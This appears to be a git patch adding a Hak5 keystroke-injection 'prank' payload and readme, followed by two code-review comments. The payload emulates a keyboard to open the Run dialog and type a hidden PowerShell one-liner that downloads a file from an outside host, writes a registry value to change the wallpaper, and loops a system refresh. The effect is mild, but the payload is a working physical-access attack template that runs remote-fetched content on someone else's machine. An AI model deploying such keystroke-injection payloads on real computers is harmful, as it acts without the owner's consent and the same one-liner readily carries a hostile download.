From d386f07d8e09e549dcc8344cbb7773497631f574 Mon Sep 17 00:00:00 2001 From: Darren Kitchen Date: Wed, 9 Jan 2019 10:58:36 -0800 Subject: [PATCH] Added wallpaper prank payload re: Hak5 episode 2502 --- .../wallpaper-changer-of-doom/payload.txt | 14 ++++++++++++++ .../prank/wallpaper-changer-of-doom/readme.md | 18 ++++++++++++++++++ 2 files changed, 32 insertions(+) create mode 100644 payloads/library/prank/wallpaper-changer-of-doom/payload.txt create mode 100644 payloads/library/prank/wallpaper-changer-of-doom/readme.md diff --git a/payloads/library/prank/wallpaper-changer-of-doom/payload.txt b/payloads/library/prank/wallpaper-changer-of-doom/payload.txt new file mode 100644 index 00000000..25d2a6c7 --- /dev/null +++ b/payloads/library/prank/wallpaper-changer-of-doom/payload.txt @@ -0,0 +1,14 @@ +# Wallpaper Changer OF DOOM!!!! +# Author: Hak5Darren +# Props: Alex Goat +# Demo: Hak5 episode 2502 - https://youtu.be/f3C58OKOsuo +# Target: Windows Vista+ +# Category: Prank + +LED SETUP +ATTACKMODE HID +LED ATTACK +Q GUI r +Q DELAY 500 +Q STRING "cmd /C \"start /MIN powershell iwr -Uri http://h4k.cc/b.jpg -OutFile c:\windows\temp\b.jpg;sp 'HKCU:Control Panel\Desktop' WallPaper 'c:\windows\temp\b.jpg';\$a=1;do{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}while(\$a++-le59)\"" +Q ENTER \ No newline at end of file diff --git a/payloads/library/prank/wallpaper-changer-of-doom/readme.md b/payloads/library/prank/wallpaper-changer-of-doom/readme.md new file mode 100644 index 00000000..c11adc01 --- /dev/null +++ b/payloads/library/prank/wallpaper-changer-of-doom/readme.md 
@@ -0,0 +1,18 @@ +# Wallpaper Changer of DOOM!!!! + +* Author: Hak5Darren +* Props: Alex Goat +* Demo: Hak5 episode 2502 - https://youtu.be/f3C58OKOsuo +* Target: Windows Vista+ +* Category: Prank + +## Description + +Single stage powershell one-liner executes from run dialog. CMD opens a minimized powershell window which downloads b.jpg (change this URL) to c:\windows\temp then sets the registry entry to change the wallpaper, then finally loops over an undocumented USER32.DLL feature for 60 seconds to force a user profile refresh. + +## STATUS + +| LED | Status | +| ----------------- | -------------------------------------- | +| SETUP | Setting attack mode | +| ATACK | Injecting keystrokes |
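Review bot: In payload.txt, the `Q STRING` line hard-codes `http://h4k.cc/b.jpg` and fetches it over plain HTTP, but nothing in the file's header comments says the URL is meant to be replaced; only readme.md mentions it ("change this URL"). Please add a header comment in payload.txt naming the URL as the one value to edit, and consider an https source so the downloaded file cannot be swapped in transit. Minor: the file ends without a trailing newline ("\ No newline at end of file").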
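Review bot: In readme.md, the last row of the STATUS table spells the LED state "ATACK"; it should read "ATTACK" to match `LED ATTACK` in payload.txt. The Description also lists what the one-liner changes (b.jpg written to c:\windows\temp, the WallPaper value under HKCU Control Panel\Desktop) but not how to undo it; a short cleanup note naming those two artifacts would let whoever receives the prank restore the original wallpaper.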